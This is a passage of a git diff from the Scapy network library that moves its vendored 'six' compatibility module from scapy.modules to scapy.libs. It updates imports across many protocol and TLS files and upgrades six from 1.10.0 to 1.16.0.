0xff): 'reserved' } SUBTYPE_RESERVED = 0x00 diff --git a/scapy/contrib/ltp.py b/scapy/contrib/ltp.py index 167a8cecd6c..5b20a8d1214 100755 --- a/scapy/contrib/ltp.py +++ b/scapy/contrib/ltp.py @@ -26,7 +26,7 @@ # scapy.contrib.description = Licklider Transmission Protocol (LTP) # scapy.contrib.status = loads -import scapy.modules.six as six +import scapy.libs.six as six from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import BitEnumField, BitField, BitFieldLenField, \ ByteEnumField, ConditionalField, PacketListField, StrLenField diff --git a/scapy/contrib/macsec.py b/scapy/contrib/macsec.py index a60d88b3d14..160b79ea543 100755 --- a/scapy/contrib/macsec.py +++ b/scapy/contrib/macsec.py @@ -26,7 +26,7 @@ from scapy.compat import raw from scapy.data import ETH_P_MACSEC, ETHER_TYPES, ETH_P_IP, ETH_P_IPV6 from scapy.error import log_loading -import scapy.modules.six as six +import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.backends import default_backend diff --git a/scapy/contrib/nfs.py b/scapy/contrib/nfs.py index 79259e39358..c5feff508c3 100644 --- a/scapy/contrib/nfs.py +++ b/scapy/contrib/nfs.py @@ -12,7 +12,7 @@ from scapy.fields import IntField, IntEnumField, FieldListField, LongField, \ XIntField, XLongField, ConditionalField, PacketListField, StrLenField, \ PacketField -from scapy.modules.six import integer_types +from scapy.libs.six import integer_types nfsstat3 = { 0: 'NFS3_OK', diff --git a/scapy/contrib/openflow.py b/scapy/contrib/openflow.py index 3eafcbdd3bd..047cc8395e8 100755 --- a/scapy/contrib/openflow.py +++ b/scapy/contrib/openflow.py @@ -23,7 +23,7 @@ from scapy.layers.inet import TCP from scapy.packet import Packet, Raw, bind_bottom_up, bind_top_down from scapy.utils import binrepr -import scapy.modules.six as six +import scapy.libs.six as six # If prereq_autocomplete is True then match prerequisites will be diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index a5582ab53df..b81e26b09bb 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -25,7 +25,7 @@ XIntField, XShortField, PacketLenField from scapy.layers.l2 import Ether from scapy.packet import Packet, Padding, Raw -import scapy.modules.six as six +import scapy.libs.six as six from scapy.contrib.openflow import _ofp_header, _ofp_header_item, \ OFPacketField, OpenFlow, _UnknownOpenFlow diff --git a/scapy/contrib/pnio.py b/scapy/contrib/pnio.py index 30be09c6ad4..9f7764a8bc5 100644 --- a/scapy/contrib/pnio.py +++ b/scapy/contrib/pnio.py @@ -30,7 +30,7 @@ StrFixedLenField, ShortField, FlagsField, ByteField, XIntField, X3BytesField ) -import scapy.modules.six as six +import scapy.libs.six as six PNIO_FRAME_IDS = { 0x0020: "PTCP-RTSyncPDU-followup", diff --git a/scapy/contrib/ppi_geotag.py b/scapy/contrib/ppi_geotag.py index a7cc6345468..fcc763fb759 100644 --- a/scapy/contrib/ppi_geotag.py +++ b/scapy/contrib/ppi_geotag.py @@ -34,8 +34,7 @@ UTCTimeField, XLEIntField, SignedByteField, XLEShortField from scapy.layers.ppi import PPI_Hdr, PPI_Element from scapy.error import warning -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six CURR_GEOTAG_VER = 2 # Major revision of specification diff --git a/scapy/contrib/skinny.py b/scapy/contrib/skinny.py index c12cb94ed58..26c22e3b4b6 100644 --- a/scapy/contrib/skinny.py +++ b/scapy/contrib/skinny.py @@ -29,7 +29,6 @@ from scapy.fields import FlagsField, IPField, LEIntEnumField, LEIntField, \ StrFixedLenField from scapy.layers.inet import TCP -from scapy.modules.six.moves import range from scapy.volatile import RandShort from scapy.config import conf diff --git a/scapy/contrib/tacacs.py b/scapy/contrib/tacacs.py index ed933f10d4f..a285aef4ecc 100755 --- a/scapy/contrib/tacacs.py +++ b/scapy/contrib/tacacs.py @@ -29,7 +29,6 @@ from scapy.layers.inet import TCP from scapy.compat import chb, orb from scapy.config import conf -from scapy.modules.six.moves import range SECRET = 'test' diff --git a/scapy/dadict.py b/scapy/dadict.py index 3b860101ebf..80b2b61f4bd 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -10,7 +10,7 @@ from __future__ import absolute_import from __future__ import print_function from scapy.error import Scapy_Exception -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import plain_str from scapy.compat import ( diff --git a/scapy/data.py b/scapy/data.py index 1a150a26a7c..df0c48449ac 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -17,7 +17,7 @@ from scapy.consts import FREEBSD, NETBSD, OPENBSD, WINDOWS from scapy.error import log_loading from scapy.compat import plain_str -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import ( Any, diff --git a/scapy/error.py b/scapy/error.py index 05c40cc32c2..bed567c439b 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -18,7 +18,7 @@ import warnings from scapy.consts import WINDOWS -import scapy.modules.six as six +import scapy.libs.six as six # Typing imports from logging import LogRecord diff --git a/scapy/fields.py b/scapy/fields.py index 640982e1efb..0cfc81ac2ab 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -38,8 +38,9 @@ in6_isaddrTeredo, in6_ptop, Net6, teredoAddrExtractInfo from scapy.base_classes import Gen, Net, BasePacket, Field_metaclass from scapy.error import warning -import scapy.modules.six as six -from scapy.modules.six import integer_types + +import scapy.libs.six as six +from scapy.libs.six import integer_types # Typing imports from scapy.compat import ( diff --git a/scapy/interfaces.py b/scapy/interfaces.py index aae0c55ad2b..e770b4f6590 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -17,8 +17,8 @@ from scapy.utils import pretty_list from scapy.utils6 import in6_isvalid -from scapy.modules.six.moves import UserDict -import scapy.modules.six as six +from scapy.libs.six.moves import UserDict +import scapy.libs.six as six # Typing imports import scapy diff --git a/scapy/layers/all.py b/scapy/layers/all.py index c387798d622..54795f4bdb0 100644 --- a/scapy/layers/all.py +++ b/scapy/layers/all.py @@ -15,7 +15,7 @@ from scapy.main import load_layer import logging -import scapy.modules.six as six +import scapy.libs.six as six ignored = list(six.moves.builtins.__dict__) + ["sys"] log = logging.getLogger("scapy.loading") diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 956a096cfa2..4d44bb27d3a 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -50,7 +50,7 @@ from scapy.error import warning from scapy.utils import lhex, mac2str, str2mac from scapy.volatile import RandMAC -from scapy.modules import six +from scapy.libs import six ########## diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index eac567455ea..a99848cb6de 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -39,7 +39,6 @@ from scapy.layers.bluetooth import EIR_Hdr, L2CAP_Hdr from scapy.layers.ppi import PPI_Element, PPI_Hdr -from scapy.modules.six.moves import range from scapy.utils import mac2str, str2mac #################### diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 75ac25ecc19..286f1c6bf45 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -17,7 +17,7 @@ from scapy.compat import Tuple, Optional, Type, List, Union, Callable, IO, \ Any, cast -import scapy.modules.six as six +import scapy.libs.six as six from scapy.config import conf from scapy.compat import orb from scapy.data import DLT_CAN_SOCKETCAN diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 4164d88e6c8..17e14398a6d 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -31,8 +31,7 @@ from scapy.arch import get_if_raw_hwaddr from scapy.sendrecv import srp1, sendp from scapy.error import warning -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six from scapy.config import conf dhcpmagic = b"c\x82Sc" diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 339862c4e49..41ade9a32ed 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -35,7 +35,7 @@ from scapy.pton_ntop import inet_pton from scapy.themes import Color from scapy.utils6 import in6_addrtovendor, in6_islladdr -import scapy.modules.six as six +import scapy.libs.six as six ############################################################################# # Helpers ## diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index e89ce200808..8ce7e75c87c 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -24,8 +24,7 @@ from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP from scapy.layers.inet6 import DestIP6Field, IP6Field from scapy.error import log_runtime, warning, Scapy_Exception -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six # https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4 diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 97661b21273..f6517b506f0 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -61,7 +61,7 @@ from scapy.layers.inet import TCP, TCP_client -from scapy.modules import six +from scapy.libs import six try: import brotli diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 5bcb588ddee..8d716e0266b 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -64,8 +64,7 @@ import scapy.as_resolvers -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six #################### # IP Tools class # diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 19f882e6334..c0a90a9fb47 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -49,7 +49,7 @@ from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ UDP, UDPerror from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP -import scapy.modules.six as six +import scapy.libs.six as six from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 from scapy.supersocket import SuperSocket, L3RawSocket diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 8251dc14bfe..9ba7c40fd96 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -56,8 +56,7 @@ ShortField, StrField, XIntField, XStrField, XStrLenField from scapy.packet import Packet, bind_layers, Raw from scapy.layers.inet import IP, UDP -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six from scapy.layers.inet6 import IPv6, IPv6ExtHdrHopByHop, IPv6ExtHdrDestOpt, \ IPv6ExtHdrRouting diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 6a563cd0d73..84f5186c843 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -51,7 +51,7 @@ XShortEnumField, XShortField, ) -from scapy.modules.six import viewitems +from scapy.libs.six import viewitems from scapy.packet import bind_layers, Packet from scapy.plist import ( PacketList, diff --git a/scapy/layers/lltd.py b/scapy/layers/lltd.py index 30af08719da..1cda828530b 100644 --- a/scapy/layers/lltd.py +++ b/scapy/layers/lltd.py @@ -22,7 +22,7 @@ from scapy.layers.inet import IPField from scapy.layers.inet6 import IP6Field from scapy.data import ETHER_ANY -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import orb, chb diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index cf80ef2b16e..d896424b3ca 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -25,8 +25,7 @@ from scapy.utils import lhex from scapy.compat import orb from scapy.config import conf -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six ############################################################################# diff --git a/scapy/layers/ppp.py b/scapy/layers/ppp.py index eb3e98750a3..b4b3257a28f 100644 --- a/scapy/layers/ppp.py +++ b/scapy/layers/ppp.py @@ -38,7 +38,7 @@ XShortField, XStrLenField, ) -from scapy.modules import six +from scapy.libs import six class PPPoE(Packet): diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index 2e3077d9cb8..7e3614cdd88 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -16,7 +16,6 @@ StrNullField from scapy.automaton import ATMT, Automaton from scapy.layers.inet import UDP, IP -from scapy.modules.six.moves import range from scapy.config import conf from scapy.volatile import RandShort diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 2b251b1d90a..0d61b7efca9 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -71,7 +71,7 @@ _tls_cipher_suites_cls from scapy.layers.tls.crypto.groups import _tls_named_groups from scapy.layers.tls.crypto.hkdf import TLS13_HKDF -from scapy.modules import six +from scapy.libs import six from scapy.packet import Raw from scapy.compat import bytes_encode diff --git a/scapy/layers/tls/basefields.py b/scapy/layers/tls/basefields.py index 752b562ec1f..bdefb64a443 100644 --- a/scapy/layers/tls/basefields.py +++ b/scapy/layers/tls/basefields.py @@ -10,7 +10,7 @@ import struct from scapy.fields import ByteField, ShortEnumField, ShortField, StrField -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import orb _tls_type = {20: "change_cipher_spec", diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 1ead6817b3a..fa3d5b68289 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -33,8 +33,7 @@ import time from scapy.config import conf, crypto_validator -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six from scapy.error import warning from scapy.utils import binrepr from scapy.asn1.asn1 import ASN1_BIT_STRING diff --git a/scapy/layers/tls/crypto/cipher_aead.py b/scapy/layers/tls/crypto/cipher_aead.py index a9bfc8b57f4..f322edb00e8 100644 --- a/scapy/layers/tls/crypto/cipher_aead.py +++ b/scapy/layers/tls/crypto/cipher_aead.py @@ -19,7 +19,7 @@ from scapy.layers.tls.crypto.pkcs1 import pkcs_i2osp, pkcs_os2ip from scapy.layers.tls.crypto.common import CipherError from scapy.utils import strxor -import scapy.modules.six as six +import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes # noqa: E501 diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index b85b29d8bcc..64ba291a5a4 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -10,7 +10,7 @@ from __future__ import absolute_import from scapy.config import conf from scapy.layers.tls.crypto.common import CipherError -import scapy.modules.six as six +import scapy.libs.six as six if conf.crypto_valid: from cryptography.utils import register_interface diff --git a/scapy/layers/tls/crypto/cipher_stream.py b/scapy/layers/tls/crypto/cipher_stream.py index 8a207a1dca9..b60c543c8d8 100644 --- a/scapy/layers/tls/crypto/cipher_stream.py +++ b/scapy/layers/tls/crypto/cipher_stream.py @@ -10,7 +10,7 @@ from __future__ import absolute_import from scapy.config import conf from scapy.layers.tls.crypto.common import CipherError -import scapy.modules.six as six +import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.primitives.ciphers import Cipher, algorithms diff --git a/scapy/layers/tls/crypto/compression.py b/scapy/layers/tls/crypto/compression.py index 049f4db092f..e540f1e7f4d 100644 --- a/scapy/layers/tls/crypto/compression.py +++ b/scapy/layers/tls/crypto/compression.py @@ -11,7 +11,7 @@ import zlib from scapy.error import warning -import scapy.modules.six as six +import scapy.libs.six as six _tls_compression_algs = {} diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index c1796ae74cd..10b853a51b2 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -18,7 +18,7 @@ from scapy.compat import bytes_int, int_bytes from scapy.error import warning from scapy.utils import long_converter -import scapy.modules.six as six +import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import dh, ec diff --git a/scapy/layers/tls/crypto/h_mac.py b/scapy/layers/tls/crypto/h_mac.py index 5235e4c84b3..664815e7baa 100644 --- a/scapy/layers/tls/crypto/h_mac.py +++ b/scapy/layers/tls/crypto/h_mac.py @@ -11,7 +11,7 @@ import hmac from scapy.layers.tls.crypto.hash import _tls_hash_algs -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import bytes_encode _SSLv3_PAD1_MD5 = b"\x36" * 48 diff --git a/scapy/layers/tls/crypto/hash.py b/scapy/layers/tls/crypto/hash.py index 056201a11ae..8ff30385603 100644 --- a/scapy/layers/tls/crypto/hash.py +++ b/scapy/layers/tls/crypto/hash.py @@ -9,7 +9,7 @@ from __future__ import absolute_import from hashlib import md5, sha1, sha224, sha256, sha384, sha512 -import scapy.modules.six as six +import scapy.libs.six as six _tls_hash_algs = {} diff --git a/scapy/layers/tls/crypto/kx_algs.py b/scapy/layers/tls/crypto/kx_algs.py index 47b8c493b75..2fbc648c6e6 100644 --- a/scapy/layers/tls/crypto/kx_algs.py +++ b/scapy/layers/tls/crypto/kx_algs.py @@ -16,7 +16,7 @@ ClientECDiffieHellmanPublic, _tls_server_ecdh_cls_guess, EncryptedPreMasterSecret) -import scapy.modules.six as six +import scapy.libs.six as six _tls_kx_algs = {} diff --git a/scapy/layers/tls/crypto/pkcs1.py b/scapy/layers/tls/crypto/pkcs1.py index 8c2ca36cf4b..736cd9b8b1a 100644 --- a/scapy/layers/tls/crypto/pkcs1.py +++ b/scapy/layers/tls/crypto/pkcs1.py @@ -13,7 +13,7 @@ from __future__ import absolute_import from scapy.compat import bytes_encode, hex_bytes, bytes_hex -import scapy.modules.six as six +import scapy.libs.six as six from scapy.config import conf, crypto_validator from scapy.error import warning diff --git a/scapy/layers/tls/crypto/prf.py b/scapy/layers/tls/crypto/prf.py index 210f9108c09..f31e25fc82f 100644 --- a/scapy/layers/tls/crypto/prf.py +++ b/scapy/layers/tls/crypto/prf.py @@ -13,7 +13,6 @@ from scapy.layers.tls.crypto.hash import _tls_hash_algs from scapy.layers.tls.crypto.h_mac import _tls_hmac_algs -from scapy.modules.six.moves import range from scapy.compat import bytes_encode diff --git a/scapy/layers/tls/crypto/suites.py b/scapy/layers/tls/crypto/suites.py index b3fa8c11cb2..05e7894f33b 100644 --- a/scapy/layers/tls/crypto/suites.py +++ b/scapy/layers/tls/crypto/suites.py @@ -15,7 +15,7 @@ from scapy.layers.tls.crypto.hash import _tls_hash_algs from scapy.layers.tls.crypto.h_mac import _tls_hmac_algs from scapy.layers.tls.crypto.ciphers import _tls_cipher_algs -import scapy.modules.six as six +import scapy.libs.six as six def get_algs_from_ciphersuite_name(ciphersuite_name): diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 74e4cc442ff..6e41865e993 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -36,7 +36,7 @@ from scapy.compat import hex_bytes, orb, raw from scapy.config import conf -from scapy.modules import six +from scapy.libs import six from scapy.packet import Packet, Raw, Padding from scapy.utils import randstring, repr_hex from scapy.layers.x509 import OCSP_Response diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index e27f36c3b6b..1a63d1a00c4 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -32,7 +32,7 @@ _tls_named_groups_import, _tls_named_groups_pubbytes, ) -import scapy.modules.six as six +import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.primitives.asymmetric import ec diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index 7300d17fcfd..db34fb82843 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -36,7 +36,7 @@ from scapy.layers.tls.crypto.cipher_stream import Cipher_NULL from scapy.layers.tls.crypto.common import CipherError from scapy.layers.tls.crypto.h_mac import HMACError -import scapy.modules.six as six +import scapy.libs.six as six if conf.crypto_valid_advanced: from scapy.layers.tls.crypto.cipher_aead import Cipher_CHACHA20_POLY1305 diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 1006fa08c2f..45cef1e6a86 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -14,7 +14,7 @@ from scapy.config import conf from scapy.compat import raw -import scapy.modules.six as six +import scapy.libs.six as six from scapy.error import log_runtime, warning from scapy.packet import Packet from scapy.pton_ntop import inet_pton diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index cd9314ccb9b..443151ccd0a 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -31,7 +31,7 @@ from scapy.packet import Packet from scapy.supersocket import SimpleSocket -import scapy.modules.six as six +import scapy.libs.six as six # Linux-specific defines (/usr/include/linux/if_tun.h) LINUX_TUNSETIFF = 0x400454ca diff --git a/scapy/modules/six.py b/scapy/libs/six.py similarity index 83% rename from scapy/modules/six.py rename to scapy/libs/six.py index bae38cde0e5..38cc256c566 100644 --- a/scapy/modules/six.py +++ b/scapy/libs/six.py @@ -1,4 +1,4 @@ -# Copyright (c) 2010-2017 Benjamin Peterson +# Copyright (c) 2010-2020 Benjamin Peterson # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal @@ -7,7 +7,7 @@ # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # -# The above copyright notice and this permission notice shall be included in all # noqa: E501 +# The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR @@ -18,10 +18,7 @@ # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. -## This file is part of Scapy -## See http://www.secdev.org/projects/scapy for more information -## Copyright (C) Philippe Biondi -## This program is published under a GPLv2 license +# This file is published as part of Scapy under GPLv2 or later """Utilities for writing code that runs on Python 2 and 3""" @@ -34,7 +31,7 @@ import types __author__ = "Benjamin Peterson " -__version__ = "1.10.0" +__version__ = "1.16.0" # Useful for very coarse version differentiation. @@ -76,6 +73,11 @@ def __len__(self): MAXSIZE = int((1 << 63) - 1) del X +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + def _add_doc(func, doc): """Add documentation to a function.""" @@ -169,7 +171,7 @@ def _resolve(self): class _SixMetaPathImporter(object): """ - A meta path importer to import scapy.modules.six.moves and its submodules. + A meta path importer to import six.moves and its submodules. This class implements a PEP302 finder and loader. It should be compatible with Python 2.5 and all existing versions of Python3 @@ -191,6 +193,11 @@ def find_module(self, fullname, path=None): return self return None + def find_spec(self, fullname, path, target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + def __get_module(self, fullname): try: return self.known_modules[fullname] @@ -228,6 +235,12 @@ def get_code(self, fullname): return None get_source = get_code # same as get_code + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + _importer = _SixMetaPathImporter(__name__) @@ -240,30 +253,31 @@ class _MovedItems(_LazyModule): _moved_attributes = [ MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), - MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), # noqa: E501 + MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), MovedAttribute("intern", "__builtin__", "sys"), MovedAttribute("map", "itertools", "builtins", "imap", "map"), MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), - MovedAttribute("getstatusoutput", "commands", "subprocess"), MovedAttribute("getoutput", "commands", "subprocess"), MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), - MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), # noqa: E501 + MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), MovedAttribute("reduce", "__builtin__", "functools"), MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), MovedAttribute("StringIO", "StringIO", "io"), - MovedAttribute("UserDict", "UserDict", "collections"), + MovedAttribute("UserDict", "UserDict", "collections", "IterableUserDict", "UserDict"), MovedAttribute("UserList", "UserList", "collections"), MovedAttribute("UserString", "UserString", "collections"), MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), - MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), # noqa: E501 + MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), MovedModule("builtins", "__builtin__"), MovedModule("configparser", "ConfigParser"), + MovedModule("collections_abc", "collections", "collections.abc" if sys.version_info >= (3, 3) else "collections"), MovedModule("copyreg", "copy_reg"), MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), - MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread" if sys.version_info < (3, 9) else "_thread"), MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), MovedModule("http_cookies", "Cookie", "http.cookies"), MovedModule("html_entities", "htmlentitydefs", "html.entities"), @@ -271,8 +285,8 @@ class _MovedItems(_LazyModule): MovedModule("http_client", "httplib", "http.client"), MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), - MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), # noqa: E501 - MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), # noqa: E501 + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), @@ -285,8 +299,8 @@ class _MovedItems(_LazyModule): MovedModule("tkinter", "Tkinter"), MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), - MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), # noqa: E501 - MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), # noqa: E501 + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), MovedModule("tkinter_tix", "Tix", "tkinter.tix"), MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), @@ -300,9 +314,9 @@ class _MovedItems(_LazyModule): MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", "tkinter.simpledialog"), - MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), # noqa: E501 - MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), # noqa: E501 - MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), # noqa: E501 + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), @@ -327,7 +341,7 @@ class _MovedItems(_LazyModule): class Module_six_moves_urllib_parse(_LazyModule): - """Lazy loading of moved objects in scapy.modules.six.urllib_parse""" + """Lazy loading of moved objects in six.moves.urllib_parse""" _urllib_parse_moved_attributes = [ @@ -345,7 +359,7 @@ class Module_six_moves_urllib_parse(_LazyModule): MovedAttribute("quote_plus", "urllib", "urllib.parse"), MovedAttribute("unquote", "urllib", "urllib.parse"), MovedAttribute("unquote_plus", "urllib", "urllib.parse"), - MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), # noqa: E501 + MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), MovedAttribute("urlencode", "urllib", "urllib.parse"), MovedAttribute("splitquery", "urllib", "urllib.parse"), MovedAttribute("splittag", "urllib", "urllib.parse"), @@ -361,15 +375,15 @@ class Module_six_moves_urllib_parse(_LazyModule): setattr(Module_six_moves_urllib_parse, attr.name, attr) del attr -Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes # noqa: E501 +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes -_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), # noqa: E501 +_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), "moves.urllib_parse", "moves.urllib.parse") class Module_six_moves_urllib_error(_LazyModule): - """Lazy loading of moved objects in scapy.modules.six.urllib_error""" + """Lazy loading of moved objects in six.moves.urllib_error""" _urllib_error_moved_attributes = [ @@ -381,15 +395,15 @@ class Module_six_moves_urllib_error(_LazyModule): setattr(Module_six_moves_urllib_error, attr.name, attr) del attr -Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes # noqa: E501 +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes -_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), # noqa: E501 +_importer._add_module(Module_six_moves_urllib_error(__name__ + 